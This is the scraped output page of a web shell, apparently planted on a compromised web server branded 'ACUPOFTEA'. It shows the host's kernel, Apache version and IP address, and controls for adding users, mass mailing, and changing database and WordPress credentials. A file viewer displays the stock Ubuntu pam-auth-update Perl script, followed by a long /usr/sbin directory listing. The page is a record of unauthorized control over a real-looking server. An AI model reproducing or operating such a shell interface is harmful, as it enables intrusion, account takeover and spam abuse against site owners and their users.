System
:
Linux loginstore 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
Software
:
Apache/2.4.52 (Ubuntu)
Server
:
190.119.170.206
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
sbin
/
10.10.0.71
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for www.loginstore.com made by tabagkayu.
Folder Name
File Name
File Content
File
pam-auth-update
#!/usr/bin/perl -w # pam-auth-update: update /etc/pam.d/common-* from /usr/share/pam-configs # # Update the /etc/pam.d/common-* files based on the per-package profiles # provided in /usr/share/pam-configs/ taking into consideration user's # preferences (as determined via debconf prompting). # # Written by Steve Langasek <steve.langasek@canonical.com> # # Copyright (C) 2008 Canonical Ltd. # # This program is free software; you can redistribute it and/or modify # it under the terms of version 3 of the GNU General Public License as # published by the Free Software Foundation. # # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, # USA. use strict; use Debconf::Client::ConfModule ':all'; use IPC::Open2 'open2'; version('2.0'); my $capb=capb('backup escape'); my $inputdir = '/usr/share/pam-configs'; my $template = 'libpam-runtime/profiles'; my $errtemplate = 'libpam-runtime/conflicts'; my $overridetemplate = 'libpam-runtime/override'; my $blanktemplate = 'libpam-runtime/no_profiles_chosen'; my $titletemplate = 'libpam-runtime/title'; my $confdir = '/etc/pam.d'; my $savedir = '/var/lib/pam'; my (%profiles, @sorted, @enabled, @conflicts, @new, %removals, %to_enable); my $force = 0; my $package = 0; my $priority = 'high'; my %md5sums = ( 'auth' => ['8d4fe17e66ba25de16a117035d1396aa'], 'account' => ['3c0c362eaf3421848b679d63fd48c3fa'], 'password' => [ '4d5c92d595a46b69cd61f18feb4c0574', '50fce2113dfda83ac8bdd5a6e706caec', '4bd7610f2e85f8ddaef79c7db7cb49eb', '9ba753d0824276b44bcadfee1f87b6bc', ], 'session' => [ 'f297c731a467822cbd86e1283263e8a3', '240fb92986c885b327cdb21dd641da8c', '4a25673e8b36f1805219027d3be02cd2', 'd38511a6ce8324742c151eed9fb57ba1', ], 'session-noninteractive' => [ 'ad2b78ce1498dd637ef36469430b6ac6', 'a20e8df3469bfe25c13a3b39161b30f0', ], ); my @invalid_modules = ('pam_tally'); opendir(DIR, $inputdir) || die "could not open config directory: $!"; while (my $profile = readdir(DIR)) { next if ($profile eq '.' || $profile eq '..' || $profile =~ m/~$/ || $profile =~ m/^#.+#$/); %{$profiles{$profile}} = parse_pam_profile($inputdir . '/' . $profile); if (defined $profiles{$profile}{'disabled'} and $profiles{$profile}{'disabled'}) { delete $profiles{$profile}; } } closedir DIR; # use a '--force' arg to specify that /etc/pam.d should be overwritten; # used only on upgrades where the postinst has already determined that the # checksums match. Module packages other than libpam-runtime itself must # NEVER use this option! Document with big skullses and crossboneses! It # needs to be exposed for libpam-runtime because that's the package that # decides whether we have a pristine config to be converted, and knows # whether the version being upgraded from is one for which the conversion # should be done. while ($#ARGV >= 0) { my $opt = shift; if ($opt eq '--force') { $force = 1; } elsif ($opt eq '--package') { $package = 1; } elsif ($opt eq '--root') { my $rootdir = shift @ARGV; $savedir = "${rootdir}$savedir"; $confdir = "${rootdir}$confdir"; $inputdir = "${rootdir}$inputdir"; } elsif ($opt eq '--remove') { while ($#ARGV >= 0) { last if ($ARGV[0] =~ /^--/); $removals{shift @ARGV} = 1; } # --remove implies --package $package = 1 if (keys(%removals)); } elsif ($opt eq '--enable') { while ($#ARGV >= 0) { last if ($ARGV[0] =~ /^--/); $to_enable{shift @ARGV} = 1; } # --enable implies --package $package = 1 if (keys(%to_enable)); } } $priority = 'medium' if ($package); x_loadtemplatefile('/var/lib/dpkg/info/libpam-runtime.templates','libpam-runtime'); # always sort by priority, so we have consistency and don't have to # shuffle later @sorted = sort { $profiles{$b}->{'Priority'} <=> $profiles{$a}->{'Priority'} || $b cmp $a } keys(%profiles); # If we're being called for package removal, filter out those options here @sorted = grep { !$removals{$_} } @sorted; subst($template, 'profile_names', join(', ',@sorted)); subst($template, 'profiles', join(', ', map { $profiles{$_}->{'Name'} } @sorted)); my $diff = diff_profiles($confdir,$savedir); if ($diff) { @enabled = grep { !$removals{$_} } @{$diff->{'mods'}}; } else { @enabled = split(/, /,get($template)); } # find out what we've seen, so we can ignore those defaults my %seen; if (-e $savedir . '/seen') { open(SEEN,$savedir . '/seen') or die("open(${savedir}/seen) failed: $!"); while (<SEEN>) { chomp; $seen{$_} = 1; } close(SEEN); } # filter out any options that are no longer available for any reason @enabled = grep { $profiles{$_} } @enabled; # an empty module set is an error, so in that case grab all the defaults if (!@enabled) { %seen = (); $priority = 'high' unless ($force); } # add configs to enable push(@enabled, grep { $to_enable{$_} } @sorted); # add any previously-unseen configs push(@enabled, grep { $profiles{$_}->{'Default'} eq 'yes' && !$seen{$_} } @sorted); @enabled = sort { $profiles{$b}->{'Priority'} <=> $profiles{$a}->{'Priority'} || $b cmp $a } @enabled; my $prev = ''; @enabled = grep { $_ ne $prev && (($prev) = $_) } @enabled; # Do we have any new options to show? If not, we shouldn't reprompt the # user, at any priority level, unless explicitly called. @new = grep { !$seen{$_} } @sorted; settitle($titletemplate); # if diff_profiles() fails, and we weren't passed a 'force' argument # (because this isn't an upgrade from an old version, or the checksum # didn't match, or we're being called by some other module package), prompt # the user whether to override. If the user declines (the default), we # never again manage this config unless manually called with '--force'. if (!$diff && !$force) { input('high',$overridetemplate); go(); $force = 1 if (get($overridetemplate) eq 'true'); } if (!$diff && !$force) { print STDERR <<EOF; pam-auth-update: Local modifications to /etc/pam.d/common-*, not updating. pam-auth-update: Run pam-auth-update --force to override. EOF exit; } umask(0022); do { @conflicts = (); if (@new || !$package) { fset($template,'seen','false'); } set($template,join(', ', @enabled)); input($priority,$template); go(); @enabled = split(/, /, get($template)); # in case of conflicts, automatically unset the lower priority # item of each pair foreach my $elem (@enabled) { for (my $i=$#enabled; $i >= 0; $i--) { my $conflict = $enabled[$i]; if ($profiles{$elem}->{'Conflicts'}->{$conflict}) { splice(@enabled,$i,1); my $desc = $profiles{$elem}->{'Name'} . ', ' . $profiles{$conflict}->{'Name'}; push(@conflicts,$desc); } } } if (@conflicts) { subst($errtemplate, 'conflicts', join("\\n", @conflicts)); input('high',$errtemplate); } set($template, join(', ', @enabled)); if (!@enabled) { input('high',$blanktemplate); # we can only end up here by user error, but give them another # shot at selecting a correct config anyway. fset($template,'seen','false'); } } while (@conflicts || !@enabled); # the decision has been made about what configs to use, so even if # something fails after this, we shouldn't go munging the default # options again. Save the list of known configs to /var/lib/pam. open(SEEN,"> $savedir/seen") or die("open(${savedir}/seen) failed: $!"); for my $i (@sorted) { print SEEN "$i\n"; } close(SEEN) or die("close(${savedir}/seen) failed: $!"); # @enabled now contains our list of profiles to use for piecing together # a config # we have: # - templates into which we insert the specialness # - magic comments denoting the beginning and end of our managed block; # looking at only the functional config lines would potentially let us # handle more cases, at the expense of much greater complexity, so # pass on this at least for the first round # - a representation of the autogenerated config stored in /var/lib/pam, # that we can diff against in order to account for changed options or # manually dropped modules # - a hash describing the local modifications the user has made to the # config; these are always preserved unless manually overridden with # the --force option write_profiles(\%profiles, \@enabled, $confdir, $savedir, $diff, $force); # take a single line from a stock config, and merge it with the # information about local admin edits sub merge_one_line { my ($line,$diff,$count) = @_; my (@opts,$modline); my ($adds,$removes); $line =~ /^((\[[^]]+\]|\w+)\s+\S+)\s*(.*)/; @opts = split(/\s+/,$3); $modline = $1; $modline =~ s/end/$count/g; if ($diff) { my $mod = $modline; $mod =~ s/(\[[^0-9]*)[0-9]+(.*\])/$1$2/g; $adds = \%{$diff->{'add'}{$mod}}; $removes = \%{$diff->{'remove'}{$mod}}; } else { $adds = $removes = undef; } for (my $i = 0; $i <= $#opts; $i++) { if ($adds->{$opts[$i]}) { delete $adds->{$opts[$i]}; } if ($removes->{$opts[$i]}) { splice(@opts,$i,1); $i--; } } return $modline . " " . join(' ',@opts,sort keys(%{$adds})) . "\n"; } # return the lines for a given config name, type, and position in the stack sub lines_for_module_and_type { my ($profiles, $mod, $type, $modpos) = @_; if ($modpos == 0 && $profiles->{$mod}{$type . '-Initial'}) { return $profiles->{$mod}{$type . '-Initial'}; } return $profiles->{$mod}{$type}; } # create a single PAM config from the indicated template and selections, # writing to a new file sub create_from_template { my($template,$dest,$profiles,$enabled,$diff,$type) = @_; my $state = 0; my $uctype = ucfirst($type); $type =~ s/-noninteractive//; open(INPUT,$template) || return 0; open(OUTPUT,">$dest") || return 0; while (<INPUT>) { if ($state == 1) { if (/^# here's the fallback if no module succeeds/) { print OUTPUT; $state++; } next; } if ($state == 3) { if (/^# end of pam-auth-update config/) { print OUTPUT; $state++; } next; } print OUTPUT; my ($pattern,$val); if ($state == 0) { $pattern = '^# here are the per-package modules \(the "Primary" block\)'; $val = 'Primary'; } elsif ($state == 2) { $pattern = '^# and here are more per-package modules \(the "Additional" block\)'; $val = 'Additional'; } else { next; } if (/$pattern/) { my $i = 0; my $count = 0; # first we need to get a count of lines that we're # going to output, so we can fix up the jumps correctly for my $mod (@{$enabled}) { my $output; next if (!$profiles->{$mod}{$uctype . '-Type'}); next if $profiles->{$mod}{$uctype . '-Type'} ne $val; $output = lines_for_module_and_type($profiles, $mod, $uctype, $i++); # bypasses a perl warning about @_, sigh my @tmparr = split("\n+",$output); $count += @tmparr; } # in case anything tries to jump in the 'additional' # block, let's try not to jump off the stack... $count-- if ($val eq 'Additional'); # no primary block, so output a stock pam_permit line # to keep the stack intact if ($val eq 'Primary' && $count == 0) { print OUTPUT "$type\t[default=1]\t\t\tpam_permit.so\n"; } $i = 0; for my $mod (@{$enabled}) { my $output; my @output; next if (!$profiles->{$mod}{$uctype . '-Type'}); next if $profiles->{$mod}{$uctype . '-Type'} ne $val; $output = lines_for_module_and_type($profiles, $mod, $uctype, $i++); for my $line (split("\n",$output)) { $line = merge_one_line($line,$diff, $count); print OUTPUT "$type\t$line"; $count--; } } $state++; } } close(INPUT); close(OUTPUT) or die("close($dest) failed: $!"); if ($state < 4) { unlink($dest); return 0; } return 1; } # take a template file, strip out everything between the markers, and # return the md5sum of the remaining contents. Used for testing for # local modifications of the boilerplate. sub get_template_md5sum { my($template) = @_; my $state = 0; open(INPUT,$template) || return ''; my($md5sum_fd,$output_fd); my $pid = open2($md5sum_fd, $output_fd, 'md5sum'); return '' if (!$pid); while (<INPUT>) { if ($state == 1) { if (/^# here's the fallback if no module succeeds/) { print $output_fd $_; $state++; } next; } if ($state == 3) { if (/^# end of pam-auth-update config/) { print $output_fd $_; $state++; } next; } print $output_fd $_; my ($pattern,$val); if ($state == 0) { $pattern = '^# here are the per-package modules \(the "Primary" block\)'; } elsif ($state == 2) { $pattern = '^# and here are more per-package modules \(the "Additional" block\)'; } else { next; } if (/$pattern/) { $state++; } } close(INPUT); close($output_fd); my $md5sum = <$md5sum_fd>; close($md5sum_fd); waitpid $pid, 0; $md5sum = (split(/\s+/,$md5sum))[0]; return $md5sum; } # merge a set of module declarations into a set of new config files, # using the information returned from diff_profiles(). sub write_profiles { my($profiles,$enabled,$confdir,$savedir,$diff,$force) = @_; if (! -d $savedir) { mkdir($savedir); } # because we can't atomically replace both /var/lib/pam/$foo and # /etc/pam.d/common-$foo at the same time, take steps to make this # somewhat robust for my $type ('auth','account','password','session', 'session-noninteractive') { my $target = $confdir . '/common-' . $type; my $template = $target; my $dest = $template . '.pam-new'; my $diff = $diff; if ($diff) { $diff = \%{$diff->{$type}}; } # Detect if the template is unmodified, and if so, use # the version from /usr/share. Depends on knowing the # md5sums of the originals. my $md5sum = get_template_md5sum($template); for my $i (@{$md5sums{$type}}) { if ($md5sum eq $i) { $template = '/usr/share/pam/common-' . $type; last; } } # first, write out the new config if (!create_from_template($template,$dest,$profiles,$enabled, $diff,$type)) { if (!$force) { return 0; } $template = '/usr/share/pam/common-' . $type; if (!create_from_template($template,$dest,$profiles, $enabled,$diff,$type)) { return 0; } } # then write out the saved config if (!open(OUTPUT, "> $savedir/$type.new")) { unlink($dest); return 0; } my $i = 0; my $uctype = ucfirst($type); for my $mod (@{$enabled}) { my $output; next if (!$profiles->{$mod}{$uctype . '-Type'}); next if ($profiles->{$mod}{$uctype . '-Type'} eq 'Additional'); $output = lines_for_module_and_type($profiles, $mod, $uctype, $i++); if ($output) { print OUTPUT "Module: $mod\n"; print OUTPUT $output . "\n"; } } # no primary block, so output a stock pam_permit line if ($i == 0) { print OUTPUT "Module: null\n"; print OUTPUT "[default=1]\t\t\tpam_permit.so\n"; } $i = 0; for my $mod (@{$enabled}) { my $output; next if (!$profiles->{$mod}{$uctype . '-Type'}); next if ($profiles->{$mod}{$uctype . '-Type'} eq 'Primary'); $output = lines_for_module_and_type($profiles, $mod, $uctype, $i++); if ($output) { print OUTPUT "Module: $mod\n"; print OUTPUT $output . "\n"; } } close(OUTPUT) or die("close($dest) failed: $!"); # then do the renames, back-to-back # we have to use system because File::Copy is in # perl-modules, not perl-base if (-e $target && $force) { system('cp','-f',$target,$target . '.pam-old') == 0 or die("cp -f ${target} ${target}.pam.old failed"); } rename($dest,$target) or die("rename($dest, $target) failed: $!"); rename("$savedir/${type}.new","$savedir/$type") or die("rename(${savedir}/${type}.new, ${savedir}/${type}) failed: $!"); } # at the end of a successful write, reset the 'seen' flag and the # value of the debconf override question. fset($overridetemplate,'seen','false'); set($overridetemplate,'false'); } # reconcile the current config in /etc/pam.d with the saved ones in # /var/lib/pam; returns a hash of profile names and the corresponding # options that should be added/removed relative to the stock config. # returns false if any of the markers are missing that permit a merge, # or on any other failure. sub diff_profiles { my ($sourcedir,$savedir) = @_; my (%diff); @{$diff{'mods'}} = (); # Load the saved config from /var/lib/pam, then iterate through all # lines in the current config that are in the managed block. # If anything fails here, just return immediately since we then # have nothing to merge; instead, the caller will decide later # whether to force an overwrite. for my $type ('auth','account','password','session', 'session-noninteractive') { my (@saved,$modname); open(SAVED,$savedir . '/' . $type) || return 0; while (<SAVED>) { if (/^Module: (.*)/) { $modname = $1; next; } chomp; # trim out the destination of any jumps; this saves # us from having to re-parse everything just to fix # up the jump lengths, when changes to these will # already show up as inconsistencies elsewhere s/(\[[^0-9]*)[0-9]+(.*\])/$1$2/g; s/(\[.*)end(.*\])/$1$2/g; my (@temp) = ($modname,$_); push(@saved,\@temp); } close(SAVED); my $state = 0; my (@prev_opts,$curmod); my $realtype = $type; $realtype =~ s/-noninteractive//; open(CURRENT,$sourcedir . '/common-' . $type) || return 0; while (<CURRENT>) { if ($state == 0) { $state = 1 if (/^# here are the per-package modules \(the "Primary" block\)/); next; } if ($state == 1) { s/^$realtype\s+//; if (/^# here's the fallback if no module succeeds/) { $state = 2; next; } } if ($state == 2) { $state = 3 if (/^# and here are more per-package modules \(the "Additional" block\)/); next; } if ($state == 3) { last if (/^# end of pam-auth-update config/); s/^$realtype\s+//; } my $found = 0; my $curopts; while (!$found && $#saved >= 0) { my $line; ($modname,$line) = @{$saved[0]}; shift(@saved); $line =~ /^((\[[^]]+\]|\w+)\s+\S+)\s*(.*)/; @prev_opts = split(/\s+/,$3); $curmod = $1; # FIXME: the key isn't derived from the config # name, so collisions are possible if more # than one config references the same module $_ =~ s/(\[[^0-9]*)[0-9]+(.*\])/$1$2/g; # check if this is a match for the current line if ($_ =~ /^\Q$curmod\E\s*(.*)$/) { $found = 1; $curopts = $1; push(@{$diff{'mods'}},$modname); } } # there's a line in the live config that doesn't # correspond to anything from the saved config. # treat this as a failure; it's very error-prone # to decide what to do with an added line that # didn't come from a package. return 0 if (!$found); for my $opt (split(/\s+/,$curopts)) { my $found = 0; for (my $i = 0; $i <= $#prev_opts; $i++) { if ($prev_opts[$i] eq $opt) { $found = 1; splice(@prev_opts,$i,1); } } $diff{$type}{'add'}{$curmod}{$opt} = 1 if (!$found); } for my $opt (@prev_opts) { $diff{$type}{'remove'}{$curmod}{$opt} = 1; } } close(CURRENT); # we couldn't parse the config, so the merge fails return 0 if ($state < 3); } return \%diff; } # simple function to parse a provided config file, in pseudo-RFC822 # format, sub parse_pam_profile { my ($profile) = $_[0]; my $fieldname; my %profile; open(PROFILE, $profile) || die "could not read profile $profile: $!"; while (<PROFILE>) { if (/^(\S+):\s+(.*)\s*$/) { $fieldname = $1; # compatibility with the first implementation round; # "Auth-Final" is now just called "Auth" $fieldname =~ s/-Final$//; if ($fieldname eq 'Conflicts') { foreach my $elem (split(/, /, $2)) { $profile{'Conflicts'}->{$elem} = 1; } } else { $profile{$fieldname} = $2; } } else { chomp; s/^\s+//; s/\s+$//; $profile{$fieldname} .= "\n$_" if ($_); if (grep { $profile{$fieldname} =~ /$_/} @invalid_modules) { $profile{'disabled'} = 1; } $profile{$fieldname} =~ s/^[\n\s]+//; } } close(PROFILE); if (!defined($profile{'Session-Interactive-Only'})) { $profile{'Session-noninteractive-Type'} = $profile{'Session-Type'}; $profile{'Session-noninteractive'} = $profile{'Session'}; $profile{'Session-noninteractive-Initial'} = $profile{'Session-Initial'}; } return %profile; }
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2026-07-30 06:58:04
..
DIR
-
drwxr-xr-x
2024-02-16 06:37:05
ModemManager
application/x-pie-executable
2.09 MB
-rwxr-xr-x
2024-07-18 02:24:32
a2disconf
text/x-perl
15.89 KB
-rwxr-xr-x
2024-03-18 01:41:27
a2dismod
text/x-perl
15.89 KB
-rwxr-xr-x
2024-03-18 01:41:27
a2dissite
text/x-perl
15.89 KB
-rwxr-xr-x
2024-03-18 01:41:27
a2enconf
text/x-perl
15.89 KB
-rwxr-xr-x
2024-03-18 01:41:27
a2enmod
text/x-perl
15.89 KB
-rwxr-xr-x
2024-03-18 01:41:27
a2ensite
text/x-perl
15.89 KB
-rwxr-xr-x
2024-03-18 01:41:27
a2query
text/x-perl
9.64 KB
-rwxr-xr-x
2026-07-06 04:41:46
aa-remove-unknown
text/x-shellscript
3 KB
-rwxr-xr-x
2025-08-15 12:17:13
aa-status
application/x-pie-executable
62.62 KB
-rwxr-xr-x
2025-08-15 12:17:13
aa-teardown
text/x-shellscript
137 B
-rwxr-xr-x
2022-02-10 12:45:25
accessdb
application/x-pie-executable
14.55 KB
-rwxr-xr-x
2022-03-17 07:03:00
add-shell
text/x-shellscript
1.03 KB
-rwxr-xr-x
2022-03-23 01:49:54
addgnupghome
text/x-shellscript
3 KB
-rwxr-xr-x
2026-01-05 10:14:39
addgroup
text/x-perl
37.35 KB
-rwxr-xr-x
2021-01-06 06:16:50
adduser
text/x-perl
37.35 KB
-rwxr-xr-x
2021-01-06 06:16:50
agetty
application/x-pie-executable
55.56 KB
-rwxr-xr-x
2026-03-06 04:10:04
apache2
application/x-pie-executable
740.95 KB
-rwxr-xr-x
2026-07-06 04:41:46
apache2ctl
text/x-shellscript
7.06 KB
-rwxr-xr-x
2024-03-18 01:41:27
apachectl
text/x-shellscript
7.06 KB
-rwxr-xr-x
2024-03-18 01:41:27
apparmor_parser
application/x-pie-executable
1.48 MB
-rwxr-xr-x
2025-08-15 12:17:13
apparmor_status
application/x-pie-executable
62.62 KB
-rwxr-xr-x
2025-08-15 12:17:13
applygnupgdefaults
text/x-shellscript
2.17 KB
-rwxr-xr-x
2026-01-05 10:14:39
arpd
application/x-pie-executable
26.33 KB
-rwxr-xr-x
2026-04-15 07:15:26
arptables
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
arptables-nft
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
arptables-nft-restore
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
arptables-nft-save
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
arptables-restore
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
arptables-save
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
auth-otp
application/x-pie-executable
18.54 KB
-rwxr-xr-x
2025-02-05 01:53:13
badblocks
application/x-pie-executable
34.32 KB
-rwxr-xr-x
2023-10-09 01:50:10
bcache-super-show
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2022-03-23 09:42:55
biosdecode
application/x-pie-executable
23.2 KB
-rwxr-xr-x
2024-10-14 08:28:46
blkdeactivate
text/x-shellscript
15.97 KB
-rwxr-xr-x
2024-11-27 07:04:29
blkdiscard
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
blkid
application/x-pie-executable
50.41 KB
-rwxr-xr-x
2026-03-06 04:10:04
blkzone
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
blockdev
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
bridge
application/x-pie-executable
92.49 KB
-rwxr-xr-x
2026-04-15 07:15:26
cache_check
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
cache_dump
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
cache_metadata_size
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
cache_repair
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
cache_restore
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
cache_writeback
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
capsh
application/x-pie-executable
30.3 KB
-rwxr-xr-x
2026-04-09 03:04:48
cfdisk
application/x-pie-executable
94.73 KB
-rwxr-xr-x
2026-03-06 04:10:04
cgdisk
application/x-pie-executable
150.48 KB
-rwxr-xr-x
2022-03-23 01:53:46
chcpu
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
check_forensic
text/x-shellscript
952 B
-rwxr-xr-x
2011-04-26 03:10:00
chgpasswd
application/x-pie-executable
58.13 KB
-rwxr-xr-x
2024-02-06 12:54:23
chmem
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
chpasswd
application/x-pie-executable
54.16 KB
-rwxr-xr-x
2024-02-06 12:54:23
chroot
application/x-pie-executable
38.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
cpgr
application/x-pie-executable
48.29 KB
-rwxr-xr-x
2024-02-06 12:54:23
cppw
application/x-pie-executable
48.29 KB
-rwxr-xr-x
2024-02-06 12:54:23
cron
application/x-pie-executable
50.58 KB
-rwxr-xr-x
2022-03-23 01:49:13
cryptdisks_start
text/x-shellscript
1.51 KB
-rwxr-xr-x
2022-01-13 09:44:36
cryptdisks_stop
text/x-shellscript
844 B
-rwxr-xr-x
2022-01-13 09:44:36
cryptsetup
application/x-pie-executable
169.55 KB
-rwxr-xr-x
2024-11-14 03:21:19
cryptsetup-reencrypt
application/x-pie-executable
90.38 KB
-rwxr-xr-x
2024-11-14 03:21:19
cryptsetup-ssh
application/x-pie-executable
23.53 KB
-rwxr-xr-x
2024-11-14 03:21:19
ctrlaltdel
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
dbconfig-generate-include
text/x-shellscript
12.36 KB
-rwxr-xr-x
2021-12-17 08:18:02
dbconfig-load-include
text/x-shellscript
5.57 KB
-rwxr-xr-x
2021-12-17 08:18:02
dcb
application/x-pie-executable
80.52 KB
-rwxr-xr-x
2026-04-15 07:15:26
debugfs
application/x-pie-executable
229.8 KB
-rwxr-xr-x
2023-10-09 01:50:10
delgroup
text/x-perl
16.11 KB
-rwxr-xr-x
2021-01-06 06:16:50
deluser
text/x-perl
16.11 KB
-rwxr-xr-x
2021-01-06 06:16:50
depmod
application/x-pie-executable
166.36 KB
-rwxr-xr-x
2026-04-30 12:32:42
devlink
application/x-pie-executable
142.86 KB
-rwxr-xr-x
2026-04-15 07:15:26
dhclient
application/x-pie-executable
442.66 KB
-rwxr-xr-x
2023-01-31 09:54:40
dhclient-script
text/x-shellscript
15.92 KB
-rwxr-xr-x
2023-01-31 09:54:40
dmeventd
application/x-pie-executable
50.38 KB
-rwxr-xr-x
2024-11-27 07:04:29
dmidecode
application/x-pie-executable
122.98 KB
-rwxr-xr-x
2024-10-14 08:28:46
dmsetup
application/x-pie-executable
171.02 KB
-rwxr-xr-x
2024-11-27 07:04:29
dmstats
application/x-pie-executable
171.02 KB
-rwxr-xr-x
2024-11-27 07:04:29
dosfsck
application/x-pie-executable
82.38 KB
-rwxr-xr-x
2022-03-23 01:51:01
dosfslabel
application/x-pie-executable
38.38 KB
-rwxr-xr-x
2022-03-23 01:51:01
dpkg-preconfigure
text/x-perl
3.58 KB
-rwxr-xr-x
2022-02-20 02:42:49
dpkg-reconfigure
text/x-perl
4.38 KB
-rwxr-xr-x
2022-02-20 02:42:49
dumpe2fs
application/x-pie-executable
30.31 KB
-rwxr-xr-x
2023-10-09 01:50:10
e2freefrag
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2023-10-09 01:50:10
e2fsck
application/x-pie-executable
351.84 KB
-rwxr-xr-x
2023-10-09 01:50:10
e2image
application/x-pie-executable
42.31 KB
-rwxr-xr-x
2023-10-09 01:50:10
e2label
application/x-pie-executable
102.55 KB
-rwxr-xr-x
2023-10-09 01:50:10
e2mmpstatus
application/x-pie-executable
30.31 KB
-rwxr-xr-x
2023-10-09 01:50:10
e2scrub
text/x-shellscript
7.13 KB
-rwxr-xr-x
2023-10-09 01:50:10
e2scrub_all
text/x-shellscript
5.27 KB
-rwxr-xr-x
2023-10-09 01:50:10
e2undo
application/x-pie-executable
22.3 KB
-rwxr-xr-x
2023-10-09 01:50:10
e4crypt
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2023-10-09 01:50:10
e4defrag
application/x-pie-executable
30.3 KB
-rwxr-xr-x
2023-10-09 01:50:10
ebtables
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
ebtables-nft
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
ebtables-nft-restore
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
ebtables-nft-save
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
ebtables-restore
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
ebtables-save
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
era_check
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
era_dump
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
era_invalidate
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
era_restore
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
ethtool
application/x-pie-executable
551.48 KB
-rwxr-xr-x
2025-03-07 02:22:37
faillock
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2026-07-16 02:06:00
fatlabel
application/x-pie-executable
38.38 KB
-rwxr-xr-x
2022-03-23 01:51:01
fdisk
application/x-pie-executable
110.42 KB
-rwxr-xr-x
2026-03-06 04:10:04
filefrag
application/x-pie-executable
18.32 KB
-rwxr-xr-x
2023-10-09 01:50:10
findfs
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
fixparts
application/x-pie-executable
58.48 KB
-rwxr-xr-x
2022-03-23 01:53:46
fsadm
text/x-shellscript
23.94 KB
-rwxr-xr-x
2024-11-27 07:04:29
fsck
application/x-pie-executable
42.42 KB
-rwxr-xr-x
2026-03-06 04:10:04
fsck.btrfs
text/x-shellscript
1.16 KB
-rwxr-xr-x
2022-02-24 05:39:55
fsck.cramfs
application/x-pie-executable
30.44 KB
-rwxr-xr-x
2026-03-06 04:10:04
fsck.ext2
application/x-pie-executable
351.84 KB
-rwxr-xr-x
2023-10-09 01:50:10
fsck.ext3
application/x-pie-executable
351.84 KB
-rwxr-xr-x
2023-10-09 01:50:10
fsck.ext4
application/x-pie-executable
351.84 KB
-rwxr-xr-x
2023-10-09 01:50:10
fsck.fat
application/x-pie-executable
82.38 KB
-rwxr-xr-x
2022-03-23 01:51:01
fsck.minix
application/x-pie-executable
54.41 KB
-rwxr-xr-x
2026-03-06 04:10:04
fsck.msdos
application/x-pie-executable
82.38 KB
-rwxr-xr-x
2022-03-23 01:51:01
fsck.vfat
application/x-pie-executable
82.38 KB
-rwxr-xr-x
2022-03-23 01:51:01
fsck.xfs
text/x-shellscript
1.89 KB
-rwxr-xr-x
2024-10-17 06:49:09
fsfreeze
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
fstab-decode
application/x-pie-executable
18.3 KB
-rwxr-xr-x
2021-12-14 09:17:22
fstrim
application/x-pie-executable
42.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
ftpasswd
text/x-perl
37.11 KB
-rwxr-xr-x
2025-02-05 01:53:13
ftpmail
text/x-perl
13.63 KB
-rwxr-xr-x
2025-02-05 01:53:13
ftpquota
text/x-perl
32.2 KB
-rwxr-xr-x
2025-02-05 01:53:13
ftpscrub
application/x-pie-executable
23.66 KB
-rwxr-xr-x
2025-02-05 01:53:13
ftpshut
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2025-02-05 01:53:13
ftpstats
text/x-perl
12.16 KB
-rwxr-xr-x
2025-02-05 01:53:13
gdisk
application/x-pie-executable
174.48 KB
-rwxr-xr-x
